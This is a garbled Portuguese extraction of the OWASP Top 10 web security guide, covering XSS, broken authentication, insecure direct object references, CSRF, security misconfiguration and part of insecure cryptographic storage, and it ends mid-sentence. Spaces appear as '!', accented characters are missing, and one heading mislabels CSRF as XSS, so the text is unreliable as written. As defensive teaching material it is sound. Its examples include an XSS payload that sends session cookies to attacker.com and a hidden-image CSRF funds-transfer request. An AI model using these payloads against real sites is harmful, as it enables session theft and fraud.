! necessrio ! assegurar ! que ! todos ! os ! dados ! inseridos ! por ! utilizadores ! e ! enviados ! pelo ! navegador ! so!
veriicados ! quanto ! ! sua ! validade ! (atravs ! da ! validao ! da ! entrada ! dos ! dados) ! e ! que ! os ! dados ! so!
devidamente ! iltrados ! antes ! de ! serem ! includos ! na ! pgina. ! A ! codiicao ! adequada ! da ! sada ! de ! dados !
assegura ! que ! os ! dados ! de ! entrada ! so ! sempre ! tratados ! como ! texto ! pelo ! navegador, ! ao ! invs ! de ! serem!
considerados!como!contedo!ativo!passvel!de!ser!executado.
Tanto!as!ferramentas!estticas!como!as!dinmicas!podem!detetar!automaticamente!problemas!de!XSS.!No!
entanto,!cada!aplicao!constri!as!pginas!de!diferente!modo!e!usa!diferentes!interpretadores!associados!
aos!navegadores!como!JavaScript,!ActiveX,!Flash!e!Silverlight,!o!que!diiculta!a!deteo!automtica.!Portanto,!
uma!deteo!completa!destes!problemas!requer!uma!combinao!de!reviso!manual!do!cdigo!e!testes!de !
penetrao!manual,!como!complemento!a!qualquer!abordagem!automtica!que!possa!ser!usada.
As!tecnologias!Web!2.0,!como!o!AJAX,!fazem!com!que!este!risco!h!XSS!h!seja!muito!mais!dicil!de!detetar !
atravs!de!ferramentas!automticas.
Como!evitar!o!XSS?
Prevenir!o!XSS!requer!manter!os!dados!no!coniveis!separados!do!contedo!ativo!do!navegador.
1. A!opo!mais!adequada!passa!por!efetuar!uma!iltragem!a!todos!os!dados!no!coniveis!que!constem!
do!contexto!HTML!(corpo,!atributos,!JavaScript,!CSS!ou!URL)!em!que!os!dados!sero!inseridos.!Os!
programadores ! necessitam ! de ! incluir ! esta ! iltragem ! nas ! suas ! aplicaes ! a ! no ! ser ! que ! as ! suas!
frameworks!de!interface!do!utilizador!j!o!faam.!Consulte!o!OWASP!XSS!Preveting!Cheat!Sheet!para!
mais!detalhes!sobre!tcnicas!de!iltragem.
2. A!validao!de!entrada!de!dados!positiva!ou!atravs!de!listas!brancas!(whitelist)!com!uma!adequada!
canonizao!e!descodiicao,!!recomendada,!uma!vez!que!ajuda!a!proteger!contra!XSS.!No!entanto,!
esta!no!!uma!defesa!completa!uma!vez!que!vrias!aplicaes!necessitam!usar!caracteres!especiais!
aquando ! da ! entrada ! de ! dados. ! Essas ! validaes ! deveriam, ! tanto ! quanto ! possvel, ! descodiicar!
qualquer!entrada!de!dados!codiicada!e!validar!o!seu!comprimento,!caracteres,!formato!e!regras!de!
negcio!antes!de!aceitar!dados!de!entrada.
A!aplicao ! usa! dados! no ! coniveis ! na! construo ! do !seguinte!fragmento ! de! HTML !sem! validao ! ou!
iltragem!dos!mesmos:
(String) ! page ! += ! "<input ! name ! ='creditcard' ! type='TEXT' ! value="" ! +!
request.getParameter("CC")+"'>";
O!atacante!modiica!o!parmetro!'CC'!no!seu!navegador!para:
'><script>document.location='http://www.attacker.com/cgiWbin/cookie.cgi?'!
%20+document.cookie</script>.
Isto!faz!com!que!o!ID!da!sesso!da!vtima!seja!enviado!para!o!endereo!web!do!atacante,!permitindo!a!este!
ltimo ! capturar ! a ! sesso ! corrente! do ! utilizador.! Ateno ! que! o ! atacante! tambm! poder! usar ! XSS! para!
destruir!qualquer!defesa!CSRF!que!a!aplicao!tenha.!Veja!a!A5!para!informao!sobre!CSRF.!
Referncias
OWASP
!OWASP!XSS!Prevention!Cheat!Sheet!
!OWASP!CrosshSite!Scripting!Article!
!ESAPI!Project!Home!Page!
!ESAPI!Encoder!API!
!ASVS:!Output!Encoding/Escaping!Requirements!(V6)!
!ASVS:!Input!Validation!Requirements!(V5)!
!Testing!Guide:!1st!3!Chapters!on!Data!Validation!Testing!
!OWASP!Code!Review!Guide:!Chapter!on!XSS!Review!
Externas
!CWE!Entry!79!on!CrosshSite!Scripting!
!Rsnake's!XSS!Attack!Cheet!Sheet!
A3!Z!Quebra!da!AutenScao!e!da!Gesto!de!
Sesses
Agente!da!
Ameaa
Considere!
atacantes!
externos ! e!
annimos,!
assim ! como!
utilizadores!
com ! as ! suas!
prprias!
contas, ! que!
podem ! tentar!
furtar ! as!
contas ! de!
outros!
utilizadores.!
Considere!
ainda! pessoas!
de ! dentro ! da!
sua ! empresa!
que!procuram!
disfarar ! as!
suas!aes.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
MDIA
COMUM
MDIA
SEVERO
Os ! atacantes!
usam ! falhas ! ou!
brechas ! nas!
funes ! de!
autenticao ! ou!
de ! gesto ! de!
sesses ! (por!
exemplo, ! contas!
expostas,!
palavrashchave,!
identiicadores!
de ! sesso) ! para!
se ! fazerem!
passar ! por!
outros!
utilizadores.
Os!programadores!desenvolvem!
frequentemente ! esquemas ! de!
autenticao ! e ! de ! gesto ! de!
sesses,!no!entanto!fazer!isto!da!
forma ! mais ! correta ! ! dicil.!
Como ! resultado, ! estes!
esquemas ! personalizados!
apresentam ! frequentemente!
falhas!em!reas!como!o!fecho!de!
sesso, ! gesto ! de ! palavrash
chave, !expirao ! de ! sesses,!
sistemas ! do ! tipo ! remember!
me, ! questes ! secretas,!
atualizao ! da ! conta, ! entre!
outros. ! Encontrar ! e ! identiicar!
estas!falhas!pode!ser,!por!vezes,!
dicil, ! uma ! vez ! que ! cada!
implementao ! tem ! as ! suas!
prprias!caractersticas.
Estas ! falhas!
podem ! permitir!
que ! algumas ! ou!
at!mesmo!todas!
as ! contas ! sejam!
atacadas. ! Uma!
vez
!
bem!
sucedido, ! o!
atacante ! pode!
fazer
!
tudo!
exatamente!
como ! a ! vtima.!
Contas ! com!
maiores!
privilgios ! so!
mais!
frequentemente!
visadas.
Impactos!de!
Negcio
Considere ! o!
valor
!
de!
negcios ! dos!
dados
!
e!
funes ! das!
aplicaes!
afetadas.
Considere!
ainda
!
o!
impacto ! de!
negcios ! de!
uma ! exposio!
pblica ! da!
vulnerabilidah
de.
Serei!vulnervel?
Os!ativos!primrios!a!serem!protegidos!so!as!credenciais!e!os!identiicadores!de!sesso.
1. Esto!as!credenciais!sempre!protegidas!enquanto!armazenadas!utilizando!funes!de!resumo!ou!
criptograia?!Veja!A7.
2. Podem!as!credenciais!ser!adivinhadas!ou!sobrepostas!atravs!de!funes!inadequadas!de!gesto!da!
conta!(ex.:!criao!da!conta,!mudana!de!palavra!passe,!recuperao!da!palavra!passe,!identiicadores !
de!sesso!fracos)?
3. So!os!identiicadores!de!sesso!expostos!no!URL!(ex.:!rehescrita!de!URL)?
4. So!os!identiicadores!de!sesso!vulnerveis!a!ataques!de!ixao!de!sesso?
5. So ! os ! identiicadores ! de ! sesso ! invalidados ! aps ! um ! determinado ! perodo ! de ! inatividade ! e ! os!
utilizadores!tem!uma!opo!para!terminar!a!sesso?
6. So!os!identiicadores!de!sesso!modiicados!aps!a!autenticao!bem!sucedida?
7. So!as!palavrashchave,!identiicadores!de!sesso!e!outras!credenciais!enviadas!atravs!de!ligaes!que!
usem!TLS?!Ver!A9.
Veja!os!requisitos!do!ASVS!nas!seces!V2!e!V3!para!maiores!detalhes.
Como!evitar!isto?
A!principal!recomendao!para!uma!organizao!!a!de!tornar!disponvel!para!os!seus!programadores:
1. Um! conjunto !nico !e!forte!de! controlos!de!autenticao! e!de!gesto!de!sesses.! Estes! controlos!
devem!ser!capazes!de:
1. Atender!a!todos!os!requisitos!para!autenticao!e!gesto!de!sesses!deinidos!no!documento!
!!Application!Security!VeriJication!Standard!!(ASVS)
!
!!em!particular!nas!seces!V2!(Autenticao)!e!
V3!(Gesto!de!Sesses).
2. Ter!uma!interface!simples!para!os!programadores.!Considere!o!Autenticador!da!ESAPI!e!as!API!de!
Utilizador!como!bons!exemplos!para!simular,!utilizar!ou!desenvolver!sobre.
2. Grandes!esforos!devem!ser!igualmente!realizados!para!evitar!a!ocorrncia!de!falhas!XSS!que!podem!
ser!utilizadas!para!furto!de!identiicadores!de!sesso.!Veja!A2.
Cenrio!#1:!Aplicao!para!reservas!de!avio!que!suporta!a!rescrita!do!URL,!colocando!os!identiicadores!de!
sesso!diretamente!no!URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
Um!utilizador!autenticado!do!endereo!web!quer!que!seus!amigos!saibam!sobre!a!venda.!Ele!encaminha!por!
ehmail ! o ! endereo ! acima ! sem! saber ! que ! lhes ! est! igualmente! a! fornecer ! o ! seu! identiicador ! de ! sesso. !
Quando!um!de!seus!amigos!usa!o!endereo,!ele!usar!no!s!o!identiicador!de!sesso!original!como!ainda!os!
dados!referentes!ao!carto!de!crdito!utilizado!na!operao!e!associados!!sesso.
Cenrio ! #2: ! Os ! processos ! de ! expirao ! das ! sesses ! da ! aplicao ! no ! esto ! parametrizados ! de ! forma!
adequada.!O!utilizador!utiliza!um!computador!pblico!para!aceder!a!um!endereo!web.!Em!vez!de!selecionar !
a!opo!de!logout!para!sair!de!sesso,!ele!fecha!simplesmente!a!janela!do!navegador!e!vaihse!embora.!Um!
atacante!pode!utilizar!o!mesmo!navegador!uma!hora!mais!tarde!e!mesmo!assim!a!sesso!original!continuar!
ativa!e!devidamente!autenticada.
Cenrio!#3:!Um!utilizador!interno!ou!atacante!externo!ganha!acesso!!base!de!dados!com!as!palavrashchave!
de!acesso!ao!sistema.!As!palavras!passe!dos!utilizadores!no!esto!cifradas,!expondo!todas!as!palavrashchave!
dos!utilizadores!a!este!atacante.
Referncias
OWASP
Para!um!conjunto!mais!completo!de!requisitos!e!de!problemas!a!serem!evitados!nesta!rea,!veja!os!requisitos!
estabelecidos!pelo!ASVS!para!a!rea!de!Autenticao!(V2)!e!de!Gesto!de!Sesses!(V3).
!OWASP!Authentication!Cheat!Sheet!
!ESAPI!Authenticator!API!
!ESAPI!User!API!
!OWASP!Development!Guide:!Chapter!on!Authentication!
!OWASP!Testing!Guide:!Chapter!on!Authentication!
Externas
!CWE!Entry!287!on!Improper!Authentication!
A4!Z!Referncias!Diretas!Inseguras!a!Objetos
Agente!da!
Ameaa
Considere ! os!
tipos ! de!
utilizadores!
do
!
seu!
sistema.!
Algum ! desses!
utilizadores!
tem ! apenas!
acesso ! parcial!
a ! certos ! tipos!
de ! dados ! do!
sistema?
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
FCIL
COMUM
FCIL
MODERADO
O ! atacante, ! que!
por!sua!vez!!um!
utilizador!
autorizado ! no!
sistema, ! altera!
simplesmente ! o!
valor ! de ! um!
parmetro ! que!
se
!
refere!
diretamente ! a!
um ! objeto ! do!
sistema ! para!
outro ! ao ! qual ! o!
utilizador ! em!
causa
!
no!
deveria ! ter!
acesso. ! Ser ! o!
acesso!
concedido?
As ! aplicaes ! usam!
frequentemente!o!nome!real!ou!
a!chave!de!um!objeto!aquando!
da!gerao!das!pginas!web.!As!
aplicaes ! nem ! sempre!
veriicam ! se ! o ! utilizador ! est!
autorizado ! para ! usar ! o ! objeto!
alvo.!Isto!resulta!numa!falha!de!
referncia ! direta ! insegura ! ao!
objeto. ! Efetuando ! testes ! !
possvel ! manipular ! facilmente!
os!valores!dos!parmetros!para!
detetar!tais!falhas!e!a!anlise!de!
cdigo ! mostra ! at ! que ! ponto!
est ! adequadamente ! a ! ser!
veriicada!a!autorizao.
Tais ! falhas!
podem!
comprometer!
todos ! os ! dados!
que ! possam ! ser!
referenciados!
pelo ! parmetro.!
A ! menos ! que ! o!
espao ! dos!
nomes ! seja!
escasso,!tornahse!
fcil ! para ! um!
atacante ! aceder!
a!todos!os!dados!
disponveis!
desse!tipo.
Impactos!de!
Negcio
Considere ! o!
valor
!
de!
negcio ! ! dos!
dados!
expostos.
Considere!
igualmente ! o!
impacto ! de!
negcio ! da!
exposio!
pblica ! da!
vulnerabilidah
de.
Serei!vulnervel?
A!melhor!forma!de!descobrir!se!uma!aplicao!!vulnervel!a!uma!referncia!direta!insegura!a!um!objeto,!
consiste!em!veriicar!que!todas!as!referncias!a!objetos!possuem!defesas!apropriadas.!Para!conseguir!isto,!!
preciso!considerar:
1. Para!referncias !diretas! a!recursos !restritos,!a!aplicao!necessita!veriicar!se!o!utilizador!est!
autorizado!a!aceder!ao!recurso!exato!que!foi!solicitado.
2. Se!a!referncia!!uma!referncia!indireta,!o!mapeamento!para!a!referncia!direta!deve!ser!limitada!
aos!valores!autorizados!para!o!utilizador!atual.
A!reviso!do!cdigo!fonte!de!uma!aplicao!pode!veriicar!de!forma!fcil!e!rpida!se!as!duas!abordagens!
anteriores!esto!implementadas!corretamente.!Os!testes!so!igualmente!um!meio!eiciente!para!identiicar !
referncias ! diretas ! a ! objetos ! e ! se ! as ! mesmas ! so ! seguras.! As ! ferramentas ! automticas ! tipicamente ! no!
procuram!este!tipo!de!falhas!uma!vez!que!no!conseguem!reconhecer!o!que!necessita!de!proteo!e!o!que!!
ou!no!seguro.
Como!evitar!isto?
Prevenir!referncias!diretas!inseguras!a!objetos!requer!a!seleo!de!uma!abordagem!que!permita!proteger!
cada!um!dos!objetos!que!possam!ser!acedidos!pelo!utilizador!(por!exemplo,!o!nmero!de!objetos,!nome!do!
icheiro):
1. Use !referncias !indiretas! a !objetos! por! utilizador! ou! por! sesso.!Isto ! permite! evitar !que! os!
atacantes!possam!atacar!diretamente!os!recursos!para!os!quais!no!esto!autorizados.!Por!exemplo,!
em!vez!de!usar!a!chave!da!base!de!dados!de!um!recurso,!pode!ser!apresentada!uma!lista!de!seis !
recursos!autorizados!para!o!utilizador!atual,!numerando!esses!recursos!de!1!a!6!para!representar!o!
valor!escolhido!pelo!utilizador.!A!aplicao!tem!que!mapear!a!referncia!indireta!de!cada!utilizador !
para ! chave ! da ! base ! de ! dados ! real ! no ! servidor. ! A !ESAPI! da ! OWASP ! inclui ! tanto ! mapeamentos!
sequenciais!como!aleatrios!que!os!programadores!podem!usar!para!eliminar!referncias!diretas!a!
objetos.
2. Verigicar!o!Acesso.!De!cada!vez!que!!utilizada!uma!referncia!direta!a!um!objeto!por!parte!de!uma !
fonte!no!conivel!o!mesmo!deve!incluir!uma!veriicao!de!controlo!de!acesso!para!assegurar!que!o!
utilizador!est!autorizado!a!usar!o!objeto!solicitado.
Uma!aplicao!usa!dados!no!veriicados!numa!chamada!SQL!que!est!a!aceder!a!informao!de!uma!conta:
String!query!=!SELECT!*!FROM!accts!WHERE!account!=!?;
PreparedStatement!pstmt!=!connection.prepareStatement(query,!);
pstmt.setString(1,!request.getParameter(acct));
ResultSet!results!=!pstmt.executeQuery();
O! atacante! pode!simplesmente!alterar ! o ! parmetro ! 'acct'! no ! seu ! navegador ! para!enviar ! qualquer ! outra!

identiicao!de!conta!que!ele!pretenda.!Se!no!for!devidamente!veriicada,!o!atacante!pode!aceder!a!contas!
de!outros!utilizadores,!ao!invs!da!conta!autorizada.
http://example.com/app/accountInfo?acct=notmyacct
Referncias!
OWASP
!OWASP!Top!10h2007!on!Insecure!Dir!Object!References!
!ESAPI!Access!Reference!Map!API!
!ESAPI ! Access ! Control ! API!!

isAuthorizedForFunction()!)
(ver ! isAuthorizedForData(), ! isAuthorizedForFile(),!
Para!requisitos!de!controlo!de!acessos!condicional!ver!a!rea!dos!requisitos!ASVS!de!controlo!de!acessos!
(V4).
External
!CWE!Entry!639!on!Insecure!Direct!Object!References!
!CWE!Entry!22!on!Path!Traversal!!(o!qual!!um!exemplo!de!ataque!por!referncia!directa!a!objecto)
A5!Z!Cross!Site!Request!Forgery!(XSS)
Agente!da!
Ameaa
Considere!
algum ! que!
engana ! os!
seus!
utilizadores!
para ! que ! os!
mesmos!
submetam!
pedidos ! para!
o
!
seu!
endereo!
web.!
Qualquer!
endereo!web!
ou ! fonte!
HTML ! a ! que!
os
!
seus!
utilizadores!
acedam ! pode!
fazer!isto.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
MDIA
GENERALIZADA
FCIL
MODERADO
O ! atacante ! cria!
pedidos ! HTTP!
forjados
!
e!
conduz ! (por!
engano)!a!vtima!
a ! submeter!
esses ! pedidos!
atravs ! de!
etiquetas ! HTML!
de!imagens,!XSS,!
ou ! numerosas!
outras ! ! tcnicas.!
Se ! o ! utilizador!
estiver!
autenticado, ! o!
ataque ! ! bem!
sucedido.
O !CSRF! tira ! proveito ! de!

aplicaes ! web ! que ! permitem!
que ! os ! atacantes ! ! prevejam!
todos ! os ! detalhes ! de ! uma!
determinada!ao.
Uma ! vez ! que ! os ! navegadores!
web ! enviam ! de ! forma!
automtica ! credenciais ! tais!
como !cookies! de ! sesso, ! os!
atacantes!podem!gerar!pginas!
web ! maliciosas ! que ! geram!
pedidos
!
forjados
!
,!
indistinguveis ! dos ! pedidos!
legtimos.
A!deteo!de!falhas!de!CSRF!!
razoavelmente ! fcil ! de ! efetuar!
por ! meio ! de ! testes ! de!
penetrao ! ou ! atravs ! de!
anlises!de!cdigo.
Os ! atacantes!
podem ! fazer!
com ! que ! as!
vtimas ! alterem!
qualquer ! dado!
que ! lhes ! seja!
permitido ! ou!
que ! executem!
qualquer ! funo!
para ! a ! qual!
tenham!
autorizao.
Impactos!de!
Negcio
Considere ! o!
valor
!
de!
negcio ! dos!
dados ! ou!
aplicaes!
afetadas.!
Imagine ! no!
ter!a!certeza!se!
os ! utilizadores!
tiveram!
inteno ! de!
realizar!ou!no!
tais!aes.
Considere ! o!
impacto!para!a!
sua!reputao.
Serei!vulnervel!ao!CSRF?
A!forma! mais!fcil! para! veriicar!se! uma!aplicao!! vulnervel!! veriicar!se! cada!ligao!e! formulrio !

contm!um!smbolo!no!previsvel!para!cada!utilizador.!Sem!este!tipo!de!smbolo!no!previsvel,!os!atacantes!
podem!forjar!pedidos!maliciosos.!Foquehse!nas!ligaes!e!formulrios!que!invocam!funes!de!mudana!de!
estados,!uma!vez!que!estes!so!os!alvos!mais!importantes!para!o!CSRF.
Deve! veriicar!transaes!de! mltiplas!etapas,!pois!estas!no!esto!inerentemente!imunes.! Os!atacantes!
podem!forjar!uma!srie!de!pedidos!utilizando!mltiplas!etiquetas!HTML!e!possivelmente!JavaScript.
Note!que!os!cookies!de!uma!sesso,!o!endereo!IP!de!origem!e!outro!tipo!de!informao!enviada!de!forma!
automtica ! pelo ! navegador ! web ! no ! interessam, ! uma ! vez ! que ! as ! mesmas ! so ! igualmente ! enviadas ! nos!
pedidos!forjados.
A!ferramenta!da!OWASP!CSRF!Tester!pode!ajudar!na!gerao!de!testes!de!casos!que!ajudam!a!demonstrar!os!
perigos!das!falhas!de!CSRF.
Como!evitar!o!CSRF
Prevenir!o!CSRF!requer!a!incluso!dum!smbolo!no!previsvel!no!corpo!ou!URL!de!cada!pedido!HTTP.!Tais!
smbolos!devem!ser,!no!mnimo,!nicos!para!cada!sesso!do!utilizador,!mas!tambm!podem!ser!nicos!por!
cada!pedido.
1. A!opo!preferida!passa!por!incluir!um!smbolo!nico!num!campo!escondido!do!formulrio.!Isto!faz!
com!que!o!valor!seja!enviado!no!corpo!do!pedido!HTTP,!evitando!a!sua!incluso!no!URL,!a!qual!!
sujeita!a!exposio.
2. O!smbolo!nico!tambm!pode!ser!includo!no!prprio!URL!ou!como!um!parmetro!desse!URL.!No!
entanto,!esta!forma!incorre!no!risco!que!o!URL!seja!exposto!a!um!atacante,!comprometendo!assim!o!
smbolo!secreto.
A!ferramenta!OWASP !CSRF!Guard! pode!ser!utilizado!para!incluir!automaticamente!esses!smbolos!na!sua!
aplicao!Java!EE,!.NET!ou!PHP.
A!ESAPI!da!OWASP!inclui!geradores!de!smbolos!e!mecanismos!de!validao!que!os!programadores!podem!
utilizar!para!proteger!as!suas!transaes.
A!aplicao!permite!que!um!utilizador!possa!submeter!um!pedido!de!alterao!de!um!estado!que!no!inclui !
nenhum!smbolo!secreto.!Conforme!segue:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
Ento!o!atacante!constri!um!pedido!que!ir!transferir!dinheiro!da!conta!da!vtima!para!a!sua!prpria!conta!e!
esconde!este!ataque!num!pedido!de!uma!imagem!ou!numa!iframe!armazenada!em!diversos!endereos!web,!
controlados!pelo!atacante.
<img!src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#!
width="0"!height="0"!/>
Caso ! a ! vtima ! visite ! qualquer ! um ! desses ! endereos ! encontrandohse ! simultaneamente ! autenticada ! no!
endereo!example.com,!qualquer!pedido!forjado!ir!incluir!as!informaes!da!sesso!do!utilizador,!que!
autorizar!inadvertidamente!o!pedido.!
Referncias
OWASP
!OWASP!CSRF!Article!
!OWASP!CSRF!Prevention!Cheat!Sheet!
!OWASP!CSRFGuard!!CSRF!Defense!Tool!
!ESAPI!Project!Home!Page!
!ESAPI!HTTPUtilities!Class!with!AntiCSRF!Tokens!
!OWASP!Testing!Guide:!Chapter!on!CSRF!Testing!
!OWASP!CSRFTester!!CSRF!Testing!Tool!
Externas
!CWE!Entry!352!on!CSRF!
A6!Z!Congurao!Incorreta!de!Segurana
Agente!da!
Ameaa
Considere!
atacantes!
externos!
annimos!
assim ! como!
utilizadores!
com ! as ! suas!
prprias!
contas ! que!
possam!tentar!
comprometer!
o ! sistema.!
Considere!
igualmente!
atacantes!
internos ! que!
pretendem!
disfarar ! ou!
esconder ! as!
suas!aes.
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
FCIL
COMUM
FCIL
MODERADO
O! atacante! pode!
aceder ! a ! contas!
criadas ! por!
omisso,!pginas!
no ! utilizadas,!
falhas ! no!
corrigidas,!
icheiros ! e!
diretorias ! no!
protegidos,!
entre ! ! outros,!
para ! conseguir!
obter!acesso!no!
autorizado, ! ou!
para ! conseguir!
obter!
conhecimentos!
sobre!o!sistema.
Uma!conigurao!de!segurana!
incorreta ! pode ! ocorrer ! a!
qualquer ! nvel ! da ! pilha!
aplicacional, ! incluindo ! a!
plataforma, ! o ! servidor ! web, ! o!
servidor
!
aplicacional,!
framework, ! assim ! como ! o!
cdigo
!
personalizado!
desenvolvido.
!
Os!
programadores
!
e!
administradores ! de ! rede!
necessitam ! de ! trabalhar ! em!
conjunto ! para! assegurar ! que ! a!
pilha ! aplicacional ! esteja!
convenientemente ! conigurada.!
As ! ferramentas ! de ! pesquisa ! e!
anlise ! automtica ! (scanners)!
so!bastante!teis!na!deteo!de!
correes/atualizaes ! em!
falta, ! coniguraes ! incorretas,!
utilizao ! de ! contas ! por!
omisso,
!
servios!
desnecessrios,!entre!outros.
Estas ! falhas!
fazem ! com ! que!
frequentemente!
os ! atacantes!
possam ! ter!
acesso ! no!
autorizado ! a!
alguns ! dados ! ou!
funcionalidades!
do ! sistema.!
Ocasionalmente,!
estas ! falhas!
comprometem!
completamente!
o!sistema.!
Impactos!de!
Negcio
O!sistema!pode!
ser!
completamente!
comprometido!
sem ! que ! se!
aperceba!disso.!
Todos ! os ! seus!
dados ! podem!
ser ! roubados!
ou!modiicados!
ao ! longo ! do!
tempo.
Os ! custos ! de!
recuperao!
podem ! ser!
bastante!
elevados.
Serei!vulnervel?
Ser!que!executou!o!robustecimento!de!segurana!apropriado!o!longo!da!pilha!aplicacional?
1. Possui!algum!processo!que!permita!manter!atualizado!o!seu!software?!Estas!atualizaes!devem!
incluir!o!Sistema! Operativo,!Servidor! Web!e!Aplicacional,! Sistema!de!Gesto!de!Bases! de!Dados, !
aplicaes,!e!todas!as!bibliotecas!de!cdigo!fonte.
2. Ser!que!tudo!aquilo!que!no!!necessrio!est!desativado,!foi!removido,!ou!no!foi!instalado!(por!
exemplo:!portas,!servios,!pginas,!contas!e!privilgios)?
3. Esto!as!palavrashchave!das!contas!por!omisso!desativadas!ou!foram!devidamente!alteradas?
4. Est ! o ! seu ! sistema ! de ! tratamento ! de ! erros ! conigurado ! de ! forma ! apropriada ! para ! impedir ! a!
divulgao!de!informao!comprometedora!atravs!de!mensagens!de!erros?
5. Esto!as!coniguraes!de!segurana!das!suas!frameworks!de!desenvolvimento!(por!exemplo,!Structs,!
Spring,!ASP.Net)!e!bibliotecas!de!cdigo!fonte!devidamente!percebidas!e!coniguradas?
Um!processo!concertado!e!repetitivo!!necessrio!para!desenvolver!e!manter!uma!conigurao!de!segurana!
aplicacional!adequada.
Como!posso!evitar!isto?
As!principais!recomendaes!so!as!de!assegurar!integralmente!as!seguintes!medidas:
1. Um!processo!de!fortalecimento!que!seja!replicvel!e!que!torne!mais!rpido!e!fcil!a!sua!implantao !
noutro!ambiente!que!esteja!devidamente!bloqueado.!Ambientes!de!desenvolvimento,!de!veriicao!e!
garantia!de!qualidade,!e!de!produo!devem!estar!conigurados!de!forma!semelhante.!Este!processo!
dever ! estar ! automatizado ! para ! minimizar ! os ! esforos ! necessrios ! para ! implementar ! um ! novo!
ambiente!seguro.
2. Um!processo!para!se!manter!a!par!com!todas!as!novas!atualizaes!e!correes!de!software!de!uma!
forma!atempada!para!cada!ambiente! em!produo.! Isto!precisa!de!incluir! todo !o!cdigo !fonte!e!
bibliotecas!usadas,!que!so!frequentemente!ignoradas.
3. Uma!arquitetura!aplicacional!robusta!que!oferea!uma!boa!separao!e!segurana!entre!os!diversos!
componentes.
4. Considere! igualmente ! a ! execuo ! peridica ! de ! ferramentas ! de! anlise ! automtica! assim ! como ! a !
realizao!de!auditorias!para!ajudar!na!deteo!de!coniguraes!incorretas!ou!correes!em!falta.
Exemplos!de!cenrios!de!ataque
Cenrio!#1:!Suponha!que!a!sua!aplicao!depende!de!uma!framework!poderosa!tal!como!a!Structs!ou!Spring.!
So!encontradas!vulnerabilidades!XSS!nestes!componentes!da !framework! da!qual!est!dependente.!Uma!
atualizao!!lanada!para!corrigir!este!problema,!no!entanto!voc!no!atualiza!as!suas!bibliotecas.!At!o!
fazer,!os!atacantes!podem!facilmente!encontrar!e!explorar!estas!vulnerabilidades!na!sua!aplicao.
Cenrio ! #2: ! A ! consola ! de ! administrao ! da ! aplicao ! ! instalada ! de ! forma ! automtica ! e ! depois ! no ! !
removida.!As!contas!por!omisso!no!so!alteradas.!Um!atacante!pode!descobrir!as!pginas!de!administrao!
no!servidor,!autenticandohse!com!a!palavrahchave!por!omisso,!tomando!assim!controlo!sobre!a!aplicao.
Cenrio!#3:!A!listagem!das!diretorias!no!foi!desativada!no!seu!servidor.!Um!atacante!pode!descobrir!que!
pode!encontrar!todos!os!icheiros!no!seu!servidor!listando!simplesmente!as!diretorias.!O!atacante!encontra!e!
descarrega!todas!as!suas!classes!Java!compiladas,!podendo!ento!reverter!as!mesmas!para!ter!acesso!ao!seu!
cdigo!fonte.!A!partir!daqui,!o!atacante!pode!tentar!encontrar!uma!vulnerabilidade!grave!no!controlo!de!
acessos!no!cdigo!fonte,!podendo!depois!explorar!a!mesma.
Cenrio ! #4: ! A ! conigurao ! de ! uma ! determinada ! aplicao ! permite ! que ! as ! listagens ! de ! erros ! sejam!
mostradas!aos!utilizadores,!expondo!assim!vulnerabilidades!potenciais.!Os!atacantes!adoram!todo!este!tipo!
de!informao!adicional!nas!mensagens!de!erro!que!as!aplicaes!produzem.
Referncias
OWASP
!OWASP!Development!Guide:!Chapter!on!Coniguration!
!OWASP!Code!Review!Guide:!Chapter!on!Error!Handling!
!OWASP!Testing!Guide:!Coniguration!Management!
!OWASP!Testing!Guide:!Testing!for!Error!Codes!
!OWASP!Top!10!2004!h!Insecure!Coniguration!Management!
Para!mais!requisitos!nesta!rea,!consulte!por!favor!o !ASVS!na!seco!de!requisitos!para!Coniguraes!de!
Segurana!(V12).
Externos
!PC!Magazine!Article!on!Web!Server!Hardening!
!CWE!Entry!2!on!Environmental!Security!Flaws!
!CIS!Security!Coniguration!Guides/Benchmarks!
A7!Z!Armazenamento!Criptogrco!Inseguro
Agente!da!
Ameaa
Considere ! os!
utilizadores!
do
!
seu!
sistema.!
Gostariam!
eles ! de ! ter!
acesso ! a!
dados!
protegidos!
sem!
permisso!
para ! o ! fazer?!
E
!
os!
administrador
es!internos?
Vetor!de!
Ataque
Vulnerabilidade!de!
Segurana
Impactos!
Tcnicos
Explorao
Prevalncia
Deteo
Impacto
DIFCIL
POUCO!COMUM
DIFCIL
SEVERO
Habitualmente!
os!atacantes!no!
quebram ! a!
criptograia.!Eles!
quebram ! outros!
elementos, ! tais!
como ! encontrar!
chaves, ! obter!
cpias ! legveis!
de ! dados, ! ou!
tentam ! aceder ! a!
dados!atravs!de!
canais ! que ! os!
decifram!
automaticah
mente.
A!falha!mais!comum!nesta!rea!
!o!simples!fato!de!no!cifrar!os!
dados ! que ! necessitam ! de ! ser!
cifrados.! Quando !a!criptograia!
! usada ! ! comum ! encontrar ! a!
gerao ! e ! armazenamento!
inseguro ! das ! chaves, ! a ! no!
rotatividade ! das ! chaves, ! e ! a!
utilizao!de!algoritmos!fracos.!
A ! utilizao ! de ! funes ! de!
resumo!fracas!sem!a!utilizao!
de ! fatores ! de ! entropia ! (salts)!
para!proteger!palavrashchave!!
igualmente ! comum. ! Os!
atacantes ! externos ! tm!
diiculdades ! em ! detetar ! estas!
falhas ! devido ! ao ! seu ! acesso!
limitado.!Habitualmente!tentam!
explorar!outras!alternativas!em!
primeiro!lugar!para!obterem!o!
desejado!acesso.
Este ! tipo ! de!

falhas!
compromete!
frequentemente!
todos ! os ! dados!
que!deveriam!ter!
sido ! cifrados.!
Tipicamente!esta!
informao!
inclui ! dados!
sensveis ! tais!
como ! registos!
mdicos,!
credenciais,!
dados ! pessoais,!
cartes ! de!
crdito, ! entre!
outros.
Impactos!de!
Negcio
Considere ! o!
valor
!
de!
negcio ! dos!
dados!perdidos!
e!o!impacto!na!
sua ! reputao.!
Qual ! ! a ! sua!
responsabilida
de ! legal ! se!
estes ! dados!
forem!
